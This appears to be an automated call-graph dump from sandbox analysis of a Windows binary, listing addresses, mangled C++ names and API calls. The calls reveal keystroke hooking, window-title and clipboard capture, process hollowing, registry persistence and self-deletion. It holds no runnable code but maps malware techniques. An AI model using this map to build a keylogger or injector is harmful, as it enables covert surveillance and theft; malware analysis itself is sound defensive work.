??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4359->4870 4364 40edd3 7 API calls 4366 40a186 4364->4366 4366->4364 4367 401289 6 API calls 4366->4367 4871 40e898 GetLastInputInfo GetTickCount 4366->4871 4872 40ed35 _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4366->4872 4873 40e85d GetForegroundWindow GetWindowTextW ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 4366->4873 4874 40818a GetLocaleInfoA ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4366->4874 4368 40a21a 34 API calls 4367->4368 4875 402198 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4368->4875 4370 40a446 39 API calls 4878 40221c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 4370->4878 4372 40a628 4374 401289 6 API calls 4372->4374 4887 404336 4372->4887 4375 40a649 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4374->4375 4376 40a656 7 API calls 4375->4376 4377 40a6c8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4375->4377 4376->4377 4377->4350 4378->4084 4382 40298e 4379->4382 4383 4029ba ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4382->4383 4383->4087 4384->4090 4386 40f645 4385->4386 4395 40f652 4386->4395 4388 40f034 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4388->4091 4388->4101 4390 40f606 4389->4390 4391 401bb5 ??2@YAPAXI 4390->4391 4392 40f60e 4391->4392 4393 40863b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4392->4393 4394 40f08b 4393->4394 4394->4098 4396 40f65e 4395->4396 4399 40f687 4396->4399 4398 40f675 4398->4388 4400 40f754 4399->4400 4406 40f6a6 4399->4406 4401 40f762 4400->4401 4402 40f7a3 4400->4402 4403 40863b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4401->4403 4405 40863b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4402->4405 4425 40f72d 4402->4425 4404 40f774 4403->4404 4407 401b8d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4404->4407 4408 40f7b6 4405->4408 4426 401bb5 4406->4426 4409 40f78d 4407->4409 4448 40f81d 4408->4448 4444 40f7fe 4409->4444 4414 40f7fe ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4414->4425 4420 40863b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4421 40f70c 4420->4421 4437 401b6b 4421->4437 4425->4398 4451 401bec 4426->4451 4428 401bc2 4429 40863b 4428->4429 4432 408645 4429->4432 4430 40865e 4433 401b8d 4430->4433 4432->4430 4454 401bc8 4432->4454 4434 401b9b 4433->4434 4435 401baf 4433->4435 4434->4435 4436 401bc8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4434->4436 4435->4420 4436->4434 4438 401b75 4437->4438 4439 401b87 4438->4439 4461 401bdc 4438->4461 4441 403626 4439->4441 4472 40fc2c free 4441->4472 4443 403631 4443->4425 4445 40f805 4444->4445 4446 40f81a 4445->4446 4447 40f80a ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4445->4447 4446->4425 4447->4445 4449 40f829 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4448->4449 4450 40f7c6 4448->4450 4449->4449 4449->4450 4450->4414 4452 401bf6 4451->4452 4453 401bf8 ??2@YAPAXI 4451->4453 4452->4453 4453->4428 4457 401c04 4454->4457 4458 401c11 4457->4458 4459 401bd6 4458->4459 4460 401c17 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4458->4460 4459->4432 4460->4459 4464 401c2c 4461->4464 4467 401c3b ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4464->4467 4468 401c4d 4467->4468 4470 401be7 4467->4470 4471 40fc2c free 4468->4471 4470->4438 4471->4470 4472->4443 4474 408693 4473->4474 4475 408698 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4474->4475 4476 40854f 4474->4476 4475->4474 4476->4110 4482 401305 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 4477->4482 4479 401300 4483 40fcba 4479->4483 4482->4479 4486 40fc8e 4483->4486 4485 401324 4485->4129 4487 40fca3 __dllonexit 4486->4487 4488 40fc97 _onexit 4486->4488 4487->4485 4488->4485 4489->4149 4491 401285 4490->4491 4492 40123f 4490->4492 4491->4145 4493 401289 6 API calls 4492->4493 4494 401252 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4493->4494 4495 401261 exit 4494->4495 4496 401269 4494->4496 4495->4496 4497 401289 6 API calls 4496->4497 4498 401277 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4497->4498 4498->4491 4499 401280 4498->4499 4504 406988 4499->4504 4501->4160 4503 401094 4502->4503 4503->4171 4503->4173 4505 4069a7 4504->4505 4506 40699d 4504->4506 4508 4069b5 4505->4508 4546 40e4ab ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4505->4546 4541 40524e TerminateThread 4506->4541 4509 4069c8 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4508->4509 4510 4069dc 4508->4510 4512 409132 2 API calls 4509->4512 4513 4069fd 4510->4513 4514 4069ed ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4510->4514 4512->4510 4516 406a0e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4513->4516 4522 406a30 4513->4522 4515 409132 2 API calls 4514->4515 4515->4513 4549 408fda RegCreateKeyA 4516->4549 4518 406a5e 4520 406a81 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4518->4520 4521 406a6a ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4518->4521 4519 406a3c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4523 408fda 7 API calls 4519->4523 4554 408f64 RegOpenKeyExA 4520->4554 4524 409132 2 API calls 4521->4524 4522->4518 4522->4519 4523->4518 4526 406a7e 4524->4526 4526->4520 4527 406ad4 4528 406af1 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ RegDeleteKeyA 4527->4528 4529 406adb GetModuleFileNameA 4527->4529 4530 406b01 getenv ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4528->4530 4529->4530 4531 406b58 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ SetFileAttributesA 4530->4531 4532 406b6b SetFileAttributesA 4530->4532 4531->4532 4533 406b80 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@ 4532->4533 4534 406b7d 4532->4534 4535 406d21 exit 4533->4535 4536 406bae 8 API calls 4533->4536 4534->4533 4537 406c8a ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4536->4537 4538 406c2a 7 API calls 4536->4538 4539 406c98 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4537->4539 4540 406cdb ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ShellExecuteA 4537->4540 4538->4537 4539->4540 4540->4535 4542 40526b UnhookWindowsHookEx TerminateThread 4541->4542 4543 40527e 4541->4543 4542->4543 4557 40520c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ DeleteFileA ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4543->4557 4560 40f234 FindFirstFileA 4546->4560 4550 408ff1 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ RegSetValueExA RegCloseKey 4549->4550 4551 409039 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4549->4551 4552 409028 4550->4552 4553 40902a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4550->4553 4551->4522 4552->4553 4553->4522 4555 408f88 RegQueryValueExA RegCloseKey 4554->4555 4556 408fb0 4554->4556 4555->4556 4556->4527 4558 405249 4557->4558 4559 40523a ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ RemoveDirectoryA 4557->4559 4558->4505 4559->4558 4561 40e4bc 4560->4561 4566 40f306 4560->4566 4561->4508 4562 40f332 FindNextFileA 4563 40f40f GetLastError 4562->4563 4562->4566 4564 40f43f FindClose 4563->4564 4563->4566 4564->4561 4565 40f428 FindClose RemoveDirectoryA 4565->4561 4566->4562 4566->4564 4566->4565 4567 40f3ea SetFileAttributesA 4566->4567 4568 40f3fc DeleteFileA 4566->4568 4569 40f3aa RemoveDirectoryA 4566->4569 4567->4568 4568->4564 4568->4566 4569->4566 4580 4011e5 FindWindowA 4570->4580 4572 401227 Sleep 4572->4570 4573 401234 88 API calls 4574 40121b 4573->4574 4574->4572 4574->4573 4581 4011d2 FindWindowA 4575->4581 4577 401209 Sleep 4577->4575 4578 401234 88 API calls 4579 4011fd 4578->4579 4579->4577 4579->4578 4580->4574 4581->4579 4582->4216 4584 406390 4583->4584 4585 406352 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 4583->4585 4586 4063d4 4584->4586 4587 406396 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 4584->4587 4588 408fda 7 API calls 4585->4588 4590 4063da ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 4586->4590 4591 40644c 4586->4591 4589 408fda 7 API calls 4587->4589 4592 406384 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4588->4592 4593 4063c8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4589->4593 4594 408fda 7 API calls 4590->4594 4595 406452 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 4591->4595 4596 4064c4 4591->4596 4592->4584 4593->4586 4597 40642e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4594->4597 4598 408fda 7 API calls 4595->4598 4599 406508 4596->4599 4600 4064ca ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 4596->4600 4597->4591 4601 4064a6 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4598->4601 4599->4232 4602 408fda 7 API calls 4600->4602 4601->4596 4603 4064fc ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4602->4603 4603->4599 4605 40f142 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4604->4605 4605->4283 4608 407f70 4607->4608 4609 40f0eb OpenProcess 4607->4609 4608->4291 4608->4298 4609->4608 4611 408ef1 4 API calls 4610->4611 4612 40e5e9 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4611->4612 4633 40eed4 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 4612->4633 4614 40e644 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4614->4265 4615->4285 4616->4289 4618 40d4bd 4617->4618 4628 4080e5 4617->4628 4619 40d4d1 CreateProcessA 4618->4619 4618->4628 4620 40d505 VirtualAlloc GetThreadContext 4619->4620 4619->4628 4621 40d530 ReadProcessMemory 4620->4621 4620->4628 4622 40d552 4621->4622 4623 40d55c VirtualAllocEx 4621->4623 4622->4623 4624 40d57d WriteProcessMemory 4623->4624 4623->4628 4625 40d596 4624->4625 4626 40d5d3 WriteProcessMemory SetThreadContext ResumeThread 4625->4626 4627 40d59e WriteProcessMemory 4625->4627 4626->4628 4627->4625 4628->4296 4628->4297 4630 409087 4629->4630 4631 40905d RegSetValueExA RegCloseKey 4629->4631 4630->4300 4631->4300 4632->4302 4634 40eef4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IIPBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4633->4634 4635 40ef2f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4633->4635 4636 40ef3c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4634->4636 4635->4636 4636->4614 4640 403988 4637->4640 4644 4039a2 4640->4644 4641 401289 6 API calls 4642 4039cb ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4641->4642 4653 40f4a3 GetForegroundWindow GetWindowTextLengthA 4642->4653 4644->4641 4645 4039e3 Sleep 4644->4645 4646 4039ec 8 API calls 4644->4646 4648 401289 6 API calls 4644->4648 4651 403a85 Sleep 4644->4651 4671 404388 4644->4671 4645->4644 4647 403774 112 API calls 4646->4647 4647->4644 4649 403a6d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4648->4649 4650 40f4a3 43 API calls 4649->4650 4650->4644 4651->4644 4654 40f4c2 7 API calls 4653->4654 4655 40f593 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4653->4655 4675 408667 4654->4675 4657 40f59e 4655->4657 4657->4644 4659 40efb5 20 API calls 4666 40f540 4659->4666 4660 40f582 4661 401b3c 2 API calls 4660->4661 4663 40f58a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4661->4663 4662 401289 6 API calls 4664 40f55e ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I 4662->4664 4663->4655 4665 40f5a2 4664->4665 4664->4666 4667 40f5d1 4665->4667 4668 40f5a8 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4665->4668 4666->4660 4666->4662 4669 401b3c 2 API calls 4667->4669 4668->4667 4670 40f5d9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4669->4670 4670->4657 4672 404393 4671->4672 4673 4043b6 4671->4673 4672->4673 4674 4043a1 UnhookWindowsHookEx TerminateThread 4672->4674 4673->4644 4674->4673 4676 40866e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4675->4676 4676->4659 4678 403762 CreateThread 4677->4678 4678->4312 4678->4313 4679 40382c 4678->4679 4688 403ae3 4679->4688 4727 404077 4682->4727 4765 403877 4685->4765 4689 403af7 Sleep ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4688->4689 4690 403b18 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ GetFileAttributesA 4689->4690 4691 403d89 4689->4691 4693 403b42 4690->4693 4694 403b2e ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ SetFileAttributesA 4690->4694 4691->4689 4692 403837 4691->4692 4695 401289 6 API calls 4693->4695 4694->4693 4696 403b4e ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4695->4696 4697 403bb0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4696->4697 4698 403b5b ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@ 4696->4698 4721 4028eb 4697->4721 4699 403b84 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@ 4698->4699 4700 403b9f ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@ 4698->4700 4699->4700 4702 403d52 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 4700->4702 4704 401289 6 API calls 4702->4704 4703 403be1 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4723 40f44c ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH 4703->4723 4706 403d6b ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4704->4706 4706->4691 4708 403d78 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ SetFileAttributesA 4706->4708 4707 403bef 4709 403ca1 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4707->4709 4710 403bf8 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@ 4707->4710 4708->4691 4711 402a2a 4 API calls 4709->4711 4712 403c21 ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2 4710->4712 4713 403c95 ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@ 4710->4713 4714 403cd4 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@ 4711->4714 4726 405288 4712->4726 4713->4709 4716 403d29 free ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4714->4716 4717 403cfd ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@ 4714->4717 4716->4702 4717->4716 4718 403c3b malloc ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@ ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@ 4719 402a2a 4 API calls 4718->4719 4720 403c82 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4719->4720 4720->4713 4722 4028fc 4721->4722 4722->4703 4724 40f472 ??Bios_base@std@ ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@ 4723->4724 4724->4707 4726->4718 4739 404089 4727->4739 4728 4040a5 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 4731 40fcba 2 API calls 4728->4731 4729 4040c6 Sleep GetForegroundWindow GetWindowTextLengthA ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@ 4732 4040f9 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ GetWindowTextA ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0 4729->4732 4729->4739 4730 403846 4731->4739 4733 404129 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 4732->4733 4732->4739 4745 403a9a 4733->4745 4736 404181 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4736->4739 4737 40e898 GetLastInputInfo GetTickCount 4737->4739 4738 404236 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4738->4739 4739->4728 4739->4729 4739->4730 4739->4737 4739->4738 4740 404244 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4739->4740 4741 4041c1 Sleep 4739->4741 4742 4041cd _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 4739->4742 4750 405142 4739->4750 4740->4730 4741->4739 4743 403a9a 4 API calls 4742->4743 4744 404224 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4743->4744 4744->4738 4746 403ab3 4745->4746 4747 403aa6 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4745->4747 4748 403ab9 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ SetEvent 4746->4748 4749 403acf ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4746->4749 4747->4746 4748->4749 4749->4736 4751 405178 4750->4751 4752 40515b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 4750->4752 4761 4050fc OpenClipboard 4751->4761 4753 40fcba 2 API calls 4752->4753 4753->4751 4755 405184 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0 4756 4051f3 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4755->4756 4757 40519a ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4755->4757 4756->4739 4757->4756 4758 4051bb ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 4757->4758 4759 403a9a 4 API calls 4758->4759 4760 4051ea ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4759->4760 4760->4756 4762 405121 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4761->4762 4763 40510d GetClipboardData CloseClipboard 4761->4763 4762->4755 4763->4762 4766 4038a5 4765->4766 4767 40388d GetModuleHandleA SetWindowsHookExA 4765->4767 4768 4038b2 GetMessageA 4766->4768 4767->4766 4769 403817 4768->4769 4770 4038b8 TranslateMessage DispatchMessageA 4768->4770 4770->4768 4777 405e9f 4771->4777 4778 405ef9 Sleep 4777->4778 4779 405f19 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4777->4779 4785 405d53 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 4777->4785 4800 405afb 12 API calls 4777->4800 4817 4057b6 13 API calls 4777->4817 4838 4056ec 6 API calls 